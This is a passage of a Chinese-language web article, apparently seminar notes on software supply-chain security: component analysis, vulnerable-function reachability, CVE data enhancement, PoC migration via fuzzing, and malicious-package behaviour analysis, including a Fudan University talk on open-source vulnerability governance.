0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">LLM OOPSLA结合大模型和传统，赋予大模型特殊漏洞检测能力，不是通用的检测方法，即对某一种漏洞类型有效。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000322" data-ratio="0.7766203703703703" data-type="png" data-w="864" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=4f40aa94&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUfd65KchprPy3WaUiaMEsRaIiaSLibEVYNQgjoWkBXEXJ4zwIeYdpuibyfQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">软件成分分析SCA<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">二进制比代码难一点，主要进行语义的相似性比对。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何做代码克隆分析<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">基于克隆比包管理器要更容易一些，关键是属性特征定义要准确。JaCC做软件成分分析，函数级、基于类的相似性比对等方法，可以试验并排除不敏感的类特征。例如，java类特征的定义，可以基于语义特征，cfg、dfg特征；要注意不是所有代码都有用，要筛选、做测试，留下有用的信息；精确识别第三方组件的特征；代码的变异点对特征来说变了，还需要设定不同语义结构改变的权值、阈值。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：漏洞的可达性分析。<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：识别脆弱函数<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">正着做脆弱函数的PoC难，不容易到达触发函数。我们提出逆向、反着做可达性分析，先识别出脆弱函数，再查询调用它的函数；难点之一在找到脆弱函数，提交commit可以知道那些函数改变，但不一定是引起漏洞的函数，需要明确change里面那些是脆弱函数。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img data-imgfileid="100000323" data-ratio="0.7684331797235023" data-type="png" data-w="868" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5a1a0eb3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUoYJVbs0nKBia6n5JYnpnjmRzV7S21L73YQmvbpTfwCnAELz4r4pTI4w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：修复的版本选择<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">修复的难点：找到没有漏洞安全版本、并且兼容性没问题的版本；这是多目标优化问题求解。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">典型现象：log4j高危漏洞，一年后，还大量存在下游版本中。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：数据的质量问题<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">做了SAST, SCA, 可达性分析之后，是否就完美了？数据质量还有大问题。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">SCA数据缺失，导致漏洞源头、类型、影响、原因等不准确。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">提出利用ai解决数据增强问题，cve的描述信息经常会缺失，影响上层应用。利用深度学习算法补全cve信息，上报cve后官方也接受了我们的补全，甚至官方因此增加了必填项的强制要求。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">问题：补丁提交commit定位<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">脆弱函数追踪，需要patch信息支撑，和之前的版本比对，找出change，这部分陈碧欢老师已经有成果。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">cve缺少patch信息，界定commit是否是patch的commit。提出借助大模型理解commit代码语义，补全cve的patch信息，并实现端到端模型，训练大模型，匹配出修复patch的commits，并做ranking，再优化判断。<o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">代码安全技术演进<o:p></o:p></span></h2><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：漏洞报告太多，到底哪些是需要修复的<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">问题：POC的质量参差不齐，需要增强<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000324" data-ratio="0.6950934579439252" data-type="png" data-w="856" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c374f619&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUZV0oQNBpNNiahCu2ibcMdFMJyeUv6boDImyppThJwgY08C0FrEty3s7A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">SAST，精确性难保证，上报太多，到底哪些需要修复，需要动态安全漏洞验证方法（高精度）；<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">漏洞poc，质量不同，不同平台的信息差异性非常大，poc数据虽然很对的，但是数据需要增强。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">另外poc的数量是远远少于cve的数量的，设想利用poc生成找不到的poc，帮助做漏洞验证。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">sca检出的漏洞，移植到其他项目、架构、平台是否也可以触发漏洞。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：恶意代码怎么检测并进行行为剖析？<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000325" data-ratio="0.7578215527230591" data-type="png" data-w="863" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c062788f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUBhfBBsyOs4877AKVC8640zBbe1GZ69YpIba0f5dHersv2p8yV8vbdA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">恶意包容易识别，特征比较突出。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">恶意行为剖析比较难，要把恶意行为的表征建模出来，告诉用户恶意包干了什么事情。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">目前主要分析python，把恶意包常见的攻击模式构建出来。基于代码语义建模和攻击序列建模，进行恶意行为剖析，显著提升恶意行为的解释性和可理解性。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">问题：POC触发漏洞有太多步骤要做<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">提问：poc到漏洞触发发有很长的路要走<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">poc形式很多，可以是step，输入一个文件、命令、文本，poc形式不是单一，验证漏洞的方式是不一样的。有些需要人工，有些输入一些信息完整。验证自动化方法。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：漏洞函数如何定位，逆向捕捉<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">提问：漏洞触发函数，逆向定位函数，是怎么做的？基于规则，规则不是那么普适性，限定了漏洞类型。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">确定脆弱函数不是复杂，也不过分追求健壮。采用了加、减两种方法。一是，削减冗余代码，我们发现并定义了很多类别，如构造函数。第二，漏洞修复时，不一定发布整个版本，可以在大版本周期内，进一步分析脆弱函数的引用情况，补全信息。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">问题：怎么看sonarqube？<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">sonar是sast的一种方式，c、cpp，sast工作类别非常多，基于程序分析进行漏洞检测的类别非常多。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：依赖到什么程度才算依赖一个组件？<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">基于源代码的依赖分析，依赖多少才算，没有明确定义。<o:p></o:p></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">主题2：开源代码漏洞治理
张源 复旦大学</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="545" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">主题要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 供应链安全的重要性与挑战：手机厂商面临的供应链安全问题突显了安卓系统上下游供应链的复杂性，特别是在收集上游数据和判断下游厂商是否修复漏洞方面的难题。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 软件安全新视角：供应链安全被视为传统软件安全的延伸，它不仅关注自身代码的安全性，还关注上游集成下来的问题，为软件安全领域带来了新的机遇。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 漏洞挖掘的核心地位：在不同层次上开展的漏洞挖掘工作是系统安全攻防技术的核心，涉及多种技术手段，如动态、静态分析、模糊测试、符号执行和大模型等，以适应不同的漏洞挖掘任务。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 漏洞数据的三要素：影响版本、危害性和修复补丁是公开漏洞库中的关键信息，但普遍存在准确性和完整性问题，需要通过技术手段进行数据增强和精确分析。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 漏洞治理与补丁部署：有效的漏洞治理依赖于补丁的正确部署，这要求上游和下游软件都能及时应用补丁。自动化迁移补丁和跨语言分析工具的开发，以及对补丁集成性的检测，是提高补丁部署效率和准确性的关键。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000326" data-ratio="0.5812356979405034" data-type="png" data-w="874" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=186e29c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUym2y91X4J8rAIQETKXygyzxbHqiaGiaZ5KQHgc0Sp6cVQUY0r1Dz5Wgw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></h2><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">供应链安全的重要性与挑战<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2019开始，手机厂商交流是提出面临的难题，供应链安全重要。安卓系统是典型的上下游供应链系统，厂商都会定制化，如何尽可能多地收集上游数据，并判断下游厂商是否修复漏洞了？<o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">软件安全新视角<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">软件供应链安全代表新的的机会，扩展了传统安全的维度。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">传统软件安全：关注自身代码<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">供应链安全：上游集成下来的问题<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000327" data-ratio="0.5990730011587485" data-type="png" data-w="863" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=83c14d67&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUs9lpjiaUibrFyg7gFnJKPEsSrDGCbRql2UiaCmvdnGLv89TvuSlI3tfzQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何发现更多漏洞<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何验证漏洞严重性<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何开发漏洞补丁<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何部署漏洞补丁<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何及时捕获披露的漏洞<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何精确排查漏洞影响<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何有效定位漏洞补丁<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何快速修复相关系统<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">传统安全做了很多工作，扫描、测试、修复漏洞，但是很多问题难做到落地，例如误报率非常高。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">供应链安全给传统安全也带了了新的机会，例如，通过从</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">上游源头、中游依赖链路、下游系统</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">三个层面着手，全局供应链数据分析，分析上下游的依赖关系,更好地评估和发现这些上游漏洞在下游系统中的具体危害和影响面，可以更精准地识别下游的漏洞。<o:p></o:p></span></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞挖掘是核心<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">各个层次都有开展，内核、系统框架、新应用，有传统安全漏洞分析，也有业务逻辑相关的漏洞挖掘。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">使用了多种技术，传统的动、静态分析、模糊测试、符号执行和大模型，主要是技术适配，让技术更好地服务于漏洞挖掘任务。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">经典案例是人脸识别，被评为最有价值漏洞。人脸识别移动端录制、云端识别，依赖于端云协同，会出现不一致，导致任意登录。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">通过智能化模糊测试，在多种关键系统组件中发现未知软件漏洞；利用移动OS访问控制缺陷检测工具，发现并预警最新手机系统的多个高危漏洞。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000328" data-ratio="0.6201641266119577" data-type="png" data-w="853" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=88f52871&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUBBoW3BOEP6ZTjDdZEx7bb1o4DMjcMnccXSrc3tPrhbKC9WAYKMlEcg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞数据三要素<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1 影响版本，公开漏洞库普遍存在漏洞影响版本信息错误的现象，人工审核有问题。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2 危害性，公开漏洞库普遍缺乏用于评估漏洞危害的信息，poc在漏洞数据库中的比例为4%，漏洞触发严重依赖于版本、配置等环境信息，缺poc，开发不愿意修改，漏洞难复现<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3 修复补丁，公开漏洞库普遍存在补丁数量少，质量低。cve是社区自发性维护<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><img class="rich_pages wxw-img" data-imgfileid="100000329" data-ratio="0.5896551724137931" data-type="png" data-w="870" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=33fe3717&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUNIjicfY5dO081WRkPUOA4pQAquicer2YaQkcOnJYaXaMcQYIia5ezvoaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞数据增强：影响版本<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="text-decoration: underline;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">传统方法的问题</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">修复前后的commit区间的所有commit都是受影响的，没有分析每个commit。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">代码克隆分析，函数和修复前后的函数对比，如果修复是细微差异，就难发现。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">相关工具包括V-SZZ, ReDeBug， MVP， V0Finder<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000330" data-ratio="0.6056818181818182" data-type="png" data-w="880" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=f239575c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUcbaR44WHuITvvOtl7BZRpFr7Qqp0mgf9PPWp0pDfzNmRFPGmBcvygw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">思路：漏洞指纹<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">目标：可以有漏报，但是要精确<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">目标指纹刻画精确，严格符合漏洞特征的，才判断是受影响版本<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img data-imgfileid="100000331" data-ratio="0.6238317757009346" data-type="png" data-w="856" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=1985368a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUdl0oa1ibvBogUpVhJsjPXUCFF9ibJ762VoRsxpsqId8eN2Qp1jTWsJ3g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞数据增强：危害性<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">poc只针对一个版本，往往是针对最新版本开发的；需要验证低版本或者调整poc；<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000332" data-ratio="0.6027713625866051" data-type="png" data-w="866" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9b1410c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICURaJ5N1Lc88D1CtMNQ6bjOKsyeHMjfIoF3ElXUicKusah7ZevcCuIZTw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">基于导向式模糊测试的poc迁移技术，漏洞的执行路径应该一致，可以指导低版本poc的迁移，但要注意代码重构以及代码细微差异会带来明显变化的场景。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000333" data-ratio="0.6270207852193995" data-type="png" data-w="866" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=85bcce72&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUSM4u8NUTvxBoLMuh9NpksicLe3BKsy5TFCmA1TtPa2vtFhAOm6FQ3CQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞数据增强：修复补丁<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">漏洞库不保含补丁信息；<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000334" data-ratio="0.6025345622119815" data-type="png" data-w="868" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=40a7788f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUVrdt88UKm0wQS3VUzTNQf5FMdaqeMW4UPEw0yJlvlMWgrwianLESicJQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 